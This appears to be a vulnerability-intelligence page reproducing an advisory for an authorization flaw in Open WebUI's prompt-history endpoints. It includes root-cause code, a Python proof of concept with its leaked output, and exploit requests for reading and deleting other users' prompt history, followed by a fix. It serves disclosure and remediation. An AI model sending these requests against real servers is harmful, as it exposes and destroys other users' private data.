Severity by source
AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L
Network-reachable HTTP API requires authenticated low-privilege access and prior knowledge of victim UUID (AC:H); full snapshot read yields C:H; only history deletion (not live prompt) yields I:L/A:L.
Primary rating from Vendor (https://github.com/open-webui/open-webui).
CVSS VectorVendor: https://github.com/open-webui/open-webui
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L
Lifecycle Timeline
2DescriptionCVE.org
Summary
Open WebUI's prompt version-history endpoints authorize the prompt_id in the URL but then act on caller-supplied history IDs without verifying that the history row belongs to that prompt (history_entry.prompt_id == prompt.id). Three operations are affected:
GET /api/v1/prompts/id/{prompt_id}/history/diff- returns another prompt's history snapshots (read).POST /api/v1/prompts/id/{prompt_id}/update/version- restores another prompt's snapshot into the caller's prompt, exposing its content (read).DELETE /api/v1/prompts/id/{prompt_id}/history/{history_id}- deletes another prompt's history entry (delete).
An authenticated user with access to any prompt they control, plus a victim prompt_history.id, can read or delete another user's private prompt history. The single-entry read endpoint (GET .../history/{history_id}) already enforces the binding; these three did not.
Impact
Security boundary crossed: prompt confidentiality and integrity.
Prompt history snapshots can contain private prompt text, internal instructions, and sensitive variables. With a known victim prompt_history.id, an attacker can read another user's snapshot (via the diff endpoint or by restoring it into their own prompt) and delete another user's history entry. The active prompt row is not destroyed; the delete impact is against version history. Exploitation requires knowing or obtaining victim history UUIDs, so severity depends on adjacent ID exposure.
Root Cause
The route checks read access only for prompt_id:
# backend/open_webui/routers/prompts.py
prompt = await Prompts.get_prompt_by_id(prompt_id, db=db)
...
if not (
user.role == 'admin'
or prompt.user_id == user.id
or await AccessGrants.has_access(
user_id=user.id,
resource_type='prompt',
resource_id=prompt.id,
permission='read',
db=db,
)
):
raise HTTPException(...)But the authorized prompt ID is not passed into the diff sink:
# backend/open_webui/routers/prompts.py
diff = await PromptHistories.compute_diff(from_id, to_id, db=db)compute_diff() fetches both history entries globally by ID and returns their full snapshots:
# backend/open_webui/models/prompt_history.py
result_from = await db.execute(select(PromptHistory).filter(PromptHistory.id == from_id))
from_entry = result_from.scalars().first()
result_to = await db.execute(select(PromptHistory).filter(PromptHistory.id == to_id))
to_entry = result_to.scalars().first()
...
return {
'from_snapshot': from_snapshot,
'to_snapshot': to_snapshot,
...
}There is no check that from_entry.prompt_id prompt_id or to_entry.prompt_id prompt_id.
The same missing binding affects two further endpoints. POST .../update/version restores a snapshot fetched globally by version_id:
# backend/open_webui/models/prompts.py - update_prompt_version
history_entry = await PromptHistories.get_history_entry_by_id(version_id, db=session)
...
prompt.content = snapshot.get('content', prompt.content)
# foreign snapshot copied into caller's prompt
prompt.version_id = version_idDELETE .../history/{history_id} deletes an entry fetched globally by history_id:
# backend/open_webui/models/prompt_history.py - delete_history_entry
result = await db.execute(select(PromptHistory).filter_by(id=history_id))
entry = result.scalars().first()
...
await db.delete(entry)Neither checks entry.prompt_id == prompt.id. The single-entry read endpoint (GET .../history/{history_id}) does (history_entry.prompt_id != prompt.id → 404); these three endpoints were missing it.
PoC
#!/usr/bin/env python3
"""
PoC for prompt history diff IDOR.
The PoC executes:
- the real routers.prompts.get_prompt_diff() route function
- the real PromptHistories.compute_diff() implementation
Fake model/DB adapters are used only to avoid requiring a running server. The
security-sensitive behavior under test is that the route authorizes the prompt
ID in the URL, then computes a diff for arbitrary history IDs without checking
that those history rows belong to the authorized prompt.
"""
from __future__ import annotations
import asyncio
import json
import os
import sys
import types
from pathlib import Path
from types import SimpleNamespace
def prepare_imports() -> None:
repo_root = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(repo_root / "backend"))
os.environ["VECTOR_DB"] = "none"
class DummyTyper:
def command(self, *args, **kwargs):
return lambda fn: fn
sys.modules.setdefault(
"typer",
types.SimpleNamespace(
Typer=lambda *args, **kwargs: DummyTyper(),
Option=lambda *args, **kwargs: None,
echo=lambda *args, **kwargs: None,
Exit=Exception,
),
)
sys.modules.setdefault("uvicorn", types.SimpleNamespace(run=lambda *args, **kwargs: None))
class FakeScalarResult:
def __init__(self, row):
self.row = row
def first(self):
return self.row
class FakeExecuteResult:
def __init__(self, row):
self.row = row
def scalars(self):
return FakeScalarResult(self.row)
class FakePromptHistoryDb:
def __init__(self, rows):
self.rows = rows
self.calls = 0
async def execute(self, stmt):
row = self.rows[self.calls]
self.calls += 1
return FakeExecuteResult(row)
class FakeDbContext:
def __init__(self, db):
self.db = db
async def __aenter__(self):
return self.db
async def __aexit__(self, exc_type, exc, tb):
return False
async def run_real_compute_diff(from_id: str, to_id: str):
import open_webui.models.prompt_history as history_module
victim_from = SimpleNamespace(
id=from_id,
prompt_id="victim-prompt",
snapshot={
"name": "Victim Prompt",
"command": "/victim",
"content": "PRIVATE_PROMPT_SECRET_V1",
},
)
victim_to = SimpleNamespace(
id=to_id,
prompt_id="victim-prompt",
snapshot={
"name": "Victim Prompt",
"command": "/victim",
"content": "PRIVATE_PROMPT_SECRET_V2",
},
)
fake_db = FakePromptHistoryDb([victim_from, victim_to])
original_context = history_module.get_async_db_context
try:
history_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)
diff = await history_module.PromptHistories.compute_diff(from_id, to_id)
finally:
history_module.get_async_db_context = original_context
return diff
async def main() -> None:
prepare_imports()
import open_webui.routers.prompts as prompts_router
attacker_prompt = SimpleNamespace(
id="attacker-prompt",
user_id="attacker",
)
attacker = SimpleNamespace(id="attacker", role="user")
victim_from_id = "victim-history-from"
victim_to_id = "victim-history-to"
class FakePrompts:
looked_up_prompt_ids = []
async def get_prompt_by_id(self, prompt_id, db=None):
self.looked_up_prompt_ids.append(prompt_id)
if prompt_id == "attacker-prompt":
return attacker_prompt
return None
class FakeAccessGrants:
async def has_access(self, *args, **kwargs):
return False
class FakePromptHistories:
compute_diff_calls = []
async def compute_diff(self, from_id, to_id, db=None):
self.compute_diff_calls.append(
{
"from_id": from_id,
"to_id": to_id,
"authorized_prompt_id_not_passed": True,
}
)
return await run_real_compute_diff(from_id, to_id)
fake_prompts = FakePrompts()
fake_histories = FakePromptHistories()
original = {
"Prompts": prompts_router.Prompts,
"AccessGrants": prompts_router.AccessGrants,
"PromptHistories": prompts_router.PromptHistories,
}
try:
prompts_router.Prompts = fake_prompts
prompts_router.AccessGrants = FakeAccessGrants()
prompts_router.PromptHistories = fake_histories
diff = await prompts_router.get_prompt_diff(
prompt_id="attacker-prompt",
from_id=victim_from_id,
to_id=victim_to_id,
user=attacker,
db=None,
)
finally:
for name, value in original.items():
setattr(prompts_router, name, value)
result = {
"confirmed": (
diff.get("from_snapshot", {}).get("content") == "PRIVATE_PROMPT_SECRET_V1"
and diff.get("to_snapshot", {}).get("content") == "PRIVATE_PROMPT_SECRET_V2"
and fake_prompts.looked_up_prompt_ids == ["attacker-prompt"]
and fake_histories.compute_diff_calls
and fake_histories.compute_diff_calls[0]["authorized_prompt_id_not_passed"] is True
),
"attacker_user_id": "attacker",
"authorized_prompt_id": "attacker-prompt",
"victim_prompt_id": "victim-prompt",
"victim_history_ids": [victim_from_id, victim_to_id],
"prompt_ids_authorized_by_route": fake_prompts.looked_up_prompt_ids,
"compute_diff_calls": fake_histories.compute_diff_calls,
"leaked_from_snapshot": diff.get("from_snapshot"),
"leaked_to_snapshot": diff.get("to_snapshot"),
"source": {
"route": "backend/open_webui/routers/prompts.py:get_prompt_diff",
"sink": "backend/open_webui/models/prompt_history.py:PromptHistories.compute_diff",
},
}
print(json.dumps(result, indent=2, sort_keys=True))
if not result["confirmed"]:
raise SystemExit(1)
if __name__ == "__main__":
asyncio.run(main())The PoC executes the real route function and the real PromptHistories.compute_diff() implementation with fake model/DB adapters. It authorizes the attacker against attacker-prompt, then supplies two victim history IDs. The route returns the victim prompt snapshots.
Result:
{
"attacker_user_id": "attacker",
"authorized_prompt_id": "attacker-prompt",
"confirmed": true,
"leaked_from_snapshot": {
"command": "/victim",
"content": "PRIVATE_PROMPT_SECRET_V1",
"name": "Victim Prompt"
},
"leaked_to_snapshot": {
"command": "/victim",
"content": "PRIVATE_PROMPT_SECRET_V2",
"name": "Victim Prompt"
},
"prompt_ids_authorized_by_route": [
"attacker-prompt"
],
"victim_history_ids": [
"victim-history-from",
"victim-history-to"
],
"victim_prompt_id": "victim-prompt"
}Exploit Sketch
Read via the diff endpoint:
- Attacker has read access to
ATTACKER_PROMPT_ID. - Attacker knows two history IDs for a victim prompt:
VICTIM_FROM_HISTORY_IDandVICTIM_TO_HISTORY_ID. - Attacker requests:
GET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID&to_id=VICTIM_TO_HISTORY_ID- The server authorizes
ATTACKER_PROMPT_ID, then returns snapshots for the victim history IDs.
Read via restore (update/version): the attacker POSTs {"version_id": "VICTIM_HISTORY_ID"} to their own prompt's update/version, then GETs their prompt; it now holds the victim snapshot's name/content/data/meta/tags.
Delete: the attacker sends DELETE /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/VICTIM_HISTORY_ID; the victim history entry is removed.
Recommended Fix
Bind every prompt-history operation to the authorized prompt before acting on a history ID, mirroring the single-entry read endpoint:
compute_diff()should acceptprompt_idand query both entries withPromptHistory.prompt_id == prompt_idalongside the id filter.delete_history_entry()should acceptprompt_idand filterfilter_by(id=history_id, prompt_id=prompt_id).update_prompt_version()should rejecthistory_entry.prompt_id != prompt_idbefore restoring.
Return 404/403 on mismatch.
Consolidation
Per our Report Handling policy this consolidates independent reports of the same prompt-history authorization flaw (one missing history_entry.prompt_id == prompt.id binding) reached through different endpoints:
- Diff-endpoint read and history deletion: @0xEr3n (earliest filings).
update/versionrestore-read: distinct path demonstrated by @5yu4n.
One CVE for the consolidated advisory.
AnalysisAI
Insecure Direct Object Reference in Open WebUI's prompt version-history API (versions ≤ 0.9.5) allows authenticated users to read or delete other users' private prompt history entries. Three endpoints authorize the URL-supplied prompt_id but pass caller-controlled history_id values to model-layer functions without verifying the history row belongs to the authorized prompt - a binding enforced correctly in a fourth endpoint but absent in these three. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Three concrete prerequisites must all be met: (1) The attacker must be an authenticated Open WebUI user with PR:L - unauthenticated exploitation is not possible. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The published CVSS 6.4 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L) is well-calibrated. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated attacker who owns any prompt in the system first obtains a victim user's `prompt_history` UUID through a side channel (e.g., API response logging, a separate enumeration endpoint). The attacker then issues `GET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID&to_id=VICTIM_TO_HISTORY_ID`; the server authorizes `ATTACKER_PROMPT_ID` and returns both victim prompt snapshots in full, including private content and internal instructions. … |
| Remediation | Upgrade open-webui to version 0.9.6, confirmed as the patched release by the GitHub Security Advisory GHSA-4r4w-2wgp-w7cj (https://github.com/open-webui/open-webui/security/advisories/GHSA-4r4w-2wgp-w7cj). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-284 – Improper Access Control
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38527
GHSA-4r4w-2wgp-w7cj